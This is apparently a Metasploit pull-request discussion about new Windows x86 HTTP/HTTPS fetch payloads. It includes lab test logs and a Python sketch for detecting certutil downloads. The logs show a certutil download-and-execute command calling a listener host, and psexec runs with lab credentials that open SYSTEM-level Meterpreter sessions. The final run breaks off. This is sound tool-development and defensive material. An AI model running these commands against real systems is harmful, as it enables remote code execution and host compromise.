
Add HTTP and HTTPS fetch payloads for Windows x86 #21172

Merged
smcintyre-r7 merged 4 commits into rapid7:master from bwatters-r7:feature/x86_windows_fetch
Apr 1, 2026


@bwatters-r7
Contributor

I'm lazy and added this to make testing the Indirect Syscall easier; I figured I'd go ahead and PR it.

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/windows/http/x86/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      LFVuldXrQS       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH       x                no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


View the full module info with the info, or info -d command.

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > to_handler
[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/x %TEMP%\qgWXjldDTi.exe & start /B %TEMP%\qgWXjldDTi.exe
[*] Payload Handler Started as Job 0
msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.189 requested /x
[*] Sending payload to 10.5.132.189 (Microsoft-CryptoAPI/6.1)
[*] Client 10.5.132.189 requested /x
[*] Sending payload to 10.5.132.189 (CertUtil URL Agent)
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (200774 bytes) to 10.5.132.189
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.189:49249) at 2026-03-23 15:49:01 -0500

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : MSFUSER-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
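
For defenders, the console output above exposes two observable artifacts of this fetch method: the `certutil -urlcache -f <url> <file> & start /B <file>` command line and the two User-Agent strings logged by the fetch server. The following detection sketch is an added example, not part of the pull request or of Metasploit; the function names and the benign sample records are constructed for illustration, while the sample command line and User-Agent values are copied from the output above.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Optional, Set, Tuple


@dataclass
class Finding:
    url: str        # remote source passed to certutil
    dest: str       # local path the download is written to
    executed: bool  # True when a later chained command references dest


def _segments(cmdline: str):
    # Split on cmd.exe separators (&, &&, |, ||) while keeping quoted text whole.
    return [s.strip() for s in re.findall(r'(?:"[^"]*"|[^&|])+', cmdline) if s.strip()]


def _tokens(segment: str):
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', segment)]


def analyze_command_line(cmdline: str) -> Optional[Finding]:
    """Flag certutil used as a downloader, and whether the file is then run."""
    segs = _segments(cmdline)
    for i, seg in enumerate(segs):
        toks = _tokens(seg)
        if not toks:
            continue
        exe = toks[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe not in ("certutil", "certutil.exe"):
            continue
        # certutil accepts both -switch and /switch spellings.
        if not any(t.lower().lstrip("-/") == "urlcache" for t in toks[1:]):
            continue
        url_idx = next(
            (n for n, t in enumerate(toks) if re.match(r"https?://", t, re.I)), None
        )
        if url_idx is None:
            continue
        dest = toks[url_idx + 1] if url_idx + 1 < len(toks) else ""
        executed = bool(dest) and any(
            dest.lower() in later.lower() for later in segs[i + 1:]
        )
        return Finding(toks[url_idx], dest, executed)
    return None


def classify_user_agent(ua: str) -> Optional[str]:
    if ua == "CertUtil URL Agent":
        return "certutil"
    if ua.startswith("Microsoft-CryptoAPI/"):
        # Also sent by ordinary CRL and certificate retrieval, so weak on its own.
        return "cryptoapi"
    return None


def flag_certutil_requests(records: Iterable[Tuple[str, str, str]]) -> Set[Tuple[str, str]]:
    """Return (client, path) pairs fetched with the certutil User-Agent."""
    flagged = set()
    for client, path, ua in records:
        if classify_user_agent(ua) == "certutil":
            flagged.add((client, path))
    return flagged


# Command line as printed by the handler in the output above.
SAMPLE_COMMAND = (
    r"certutil -urlcache -f http://10.5.135.201:8080/x "
    r"%TEMP%\qgWXjldDTi.exe & start /B %TEMP%\qgWXjldDTi.exe"
)

# (client, path, user-agent): first two rows mirror the fetch server log above,
# the third is a constructed benign CRL retrieval.
SAMPLE_REQUESTS = [
    ("10.5.132.189", "/x", "Microsoft-CryptoAPI/6.1"),
    ("10.5.132.189", "/x", "CertUtil URL Agent"),
    ("10.5.140.7", "/pki/root.crl", "Microsoft-CryptoAPI/10.0"),
]

if __name__ == "__main__":
    print(analyze_command_line(SAMPLE_COMMAND))
    print(flag_certutil_requests(SAMPLE_REQUESTS))
```

A download that is not followed by execution in the same command line still returns a `Finding` with `executed` set to `False`, so it can be triaged at lower severity rather than dropped.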

@bwatters-r7
Contributor Author

Sigh. Gotta leave specs for config files, I guess.

@smcintyre-r7 smcintyre-r7 self-assigned this Mar 30, 2026
@smcintyre-r7
Contributor

This looks easy enough to land. @bwatters-r7 I think if you rebase this to pull in the latest changes from master, the PHP macos tests should start passing. You'll also get the fix to the payload cached size update script which should fix the cache size failures, though on looking at them I would not have guessed that these changes would have triggered those failures.

@bwatters-r7
Contributor Author

@smcintyre-r7 I'm not sure that the payload_cached error is related. I can run that test locally and sometimes it passes, and sometimes, it fails?

tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ bundle exec rspec spec/lib/msf/core/payload_spec.rb
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
Run options:
  include {:focus=>true}
  exclude {:acceptance=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 40303
Msf::Payload ../home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:45: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:31: warning: previous definition of CachedSize was here
./home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:19: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:45: warning: previous definition of CachedSize was here
.F

  1) Msf::Payload.cached_size when CachedSize is not defined returns nil
     Failure/Error: expect(klass.cached_size).to be_nil
     
       expected: nil
            got: 123
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-support-3.13.6/lib/rspec/support.rb:110:in `block in <module:Support>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-support-3.13.6/lib/rspec/support.rb:119:in `notify_failure'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/fail_with.rb:35:in `fail_with'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:39:in `handle_failure'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:55:in `block in handle_matcher'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:26:in `with_matcher'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:47:in `handle_matcher'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/expectation_target.rb:65:in `to'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/expectation_target.rb:101:in `to'
     # ./spec/lib/msf/core/payload_spec.rb:12:in `block (4 levels) in <top (required)>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:263:in `instance_exec'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:263:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:511:in `block in with_around_and_singleton_context_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:468:in `block in with_around_example_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:486:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:626:in `block in run_around_example_hooks_for'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:352:in `call'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-rails-8.0.2/lib/rspec/rails/adapters.rb:75:in `block (2 levels) in <module:MinitestLifecycleAdapter>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:457:in `instance_exec'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:457:in `instance_exec'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:390:in `execute_with'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:628:in `block (2 levels) in run_around_example_hooks_for'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:352:in `call'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:629:in `run_around_example_hooks_for'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:486:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:468:in `with_around_example_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:511:in `with_around_and_singleton_context_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:259:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:653:in `block in run_examples'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:649:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:649:in `run_examples'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:614:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:121:in `block (3 levels) in run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:121:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:121:in `block (2 levels) in run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/configuration.rb:2097:in `with_suite_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:116:in `block in run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/reporter.rb:74:in `report'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:115:in `run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:89:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:71:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:45:in `invoke'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/exe/rspec:4:in `<top (required)>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/rspec:25:in `load'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/rspec:25:in `<main>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/ruby_executable_hooks:22:in `eval'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/ruby_executable_hooks:22:in `<main>'

Top 5 slowest examples (0.07305 seconds, 29.7% of total time):
  Msf::Payload.cached_size when CachedSize is defined as :dynamic returns nil
    0.03989 seconds ./spec/lib/msf/core/payload_spec.rb:35
  Msf::Payload#cached_size delegates to .cached_size
    0.02753 seconds ./spec/lib/msf/core/payload_spec.rb:61
  Msf::Payload.cached_size when CachedSize is not defined returns nil
    0.00214 seconds ./spec/lib/msf/core/payload_spec.rb:11
  Msf::Payload.cached_size when class is a Stager and CachedSizeOverrides is defined returns the override value for the stager refname
    0.00186 seconds ./spec/lib/msf/core/payload_spec.rb:54
  Msf::Payload.cached_size when CachedSize is defined as an integer returns the integer value
    0.00162 seconds ./spec/lib/msf/core/payload_spec.rb:23

Finished in 0.24611 seconds (files took 2.83 seconds to load)
5 examples, 1 failure

Failed examples:

rspec ./spec/lib/msf/core/payload_spec.rb:11 # Msf::Payload.cached_size when CachedSize is not defined returns nil

Randomized with seed 40303
Coverage report generated for RSpec to /home/tmoose/rapid7/metasploit-framework/coverage.
Line Coverage: 18.49% (2565 / 13875)
SimpleCov failed with exit 1
[ruby-3.3.8@metasploit-framework](feature/x86_windows_fetch) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ bundle exec rspec spec/lib/msf/core/payload_spec.rb
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
Run options:
  include {:focus=>true}
  exclude {:acceptance=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 13797
Msf::Payload ../home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:31: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:45: warning: previous definition of CachedSize was here
./home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:19: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:31: warning: previous definition of CachedSize was here
..

Top 5 slowest examples (0.06189 seconds, 30.5% of total time):
  Msf::Payload.cached_size when CachedSize is not defined returns nil
    0.03976 seconds ./spec/lib/msf/core/payload_spec.rb:11
  Msf::Payload#cached_size delegates to .cached_size
    0.01065 seconds ./spec/lib/msf/core/payload_spec.rb:61
  Msf::Payload.cached_size when CachedSize is defined as :dynamic returns nil
    0.00415 seconds ./spec/lib/msf/core/payload_spec.rb:35
  Msf::Payload.cached_size when CachedSize is defined as an integer returns the integer value
    0.0038 seconds ./spec/lib/msf/core/payload_spec.rb:23
  Msf::Payload.cached_size when class is a Stager and CachedSizeOverrides is defined returns the override value for the stager refname
    0.00353 seconds ./spec/lib/msf/core/payload_spec.rb:54

Finished in 0.20311 seconds (files took 2.79 seconds to load)
5 examples, 0 failures

Randomized with seed 13797
Coverage report generated for RSpec to /home/tmoose/rapid7/metasploit-framework/coverage.
Line Coverage: 18.49% (2565 / 13875)

Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Changes look good, tests are passing and both x86 HTTP and HTTPS are working.

msf exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Payload options (cmd/windows/http/x86/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      sNmzAYoP         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.227  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf exploit(windows/smb/psexec) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49727) at 2026-03-31 11:46:19 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\sCoOOlxASHS.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/https/x86/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/https/x86/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:49734) at 2026-03-31 11:46:37 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\BUPBGDNjeF.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 2

[*] 192.168.159.10 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Payload options (cmd/windows/https/x86/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_CHECK_CERT    false            yes       Check SSL certificate
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      acbPkCHOlaY      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf exploit(windows/smb/psexec) >

Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
]
)
end
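
Review bot: The accepted-values list on the `Msf::OptEnum.new('FETCH_COMMAND', ...)` line still includes `TFTP` alongside `CURL` and `CERTUTIL`. If this registration belongs to the HTTP adapter, consider narrowing the list to the commands that can actually fetch over HTTP, so that an unusable choice is rejected by option validation; the `show options` output earlier on this page lists `Accepted: CURL, TFTP, CERTUTIL` for the HTTP payload. A short comment stating why the option is registered again here would also help the next reader.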
Contributor

If the purpose of this is to set the default for HTTP then I think this should be redundant and able to be removed because you set the default on L16. I think this would only be necessary if either there's a bug and 'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' }, isn't working or you need to adjust the available binaries.

@bwatters-r7
Contributor Author

I broke my own specs...... 😆

Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Tested all 4 payloads with their default FETCH_COMMAND on a Server 2019 target. All the tests passed, all the CI tests are passing and the changes make sense so I'm going to go ahead and merge this in.


Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Payload options (cmd/windows/https/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_CHECK_CERT    false            yes       Check SSL certificate
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      UpVFakHojgGq     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.227  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (192.168.250.227:4444 -> 192.168.250.89:61894) at 2026-04-01 14:30:02 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\EEtoXVqiauOsWNgl.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/https/x86/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/https/x86/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
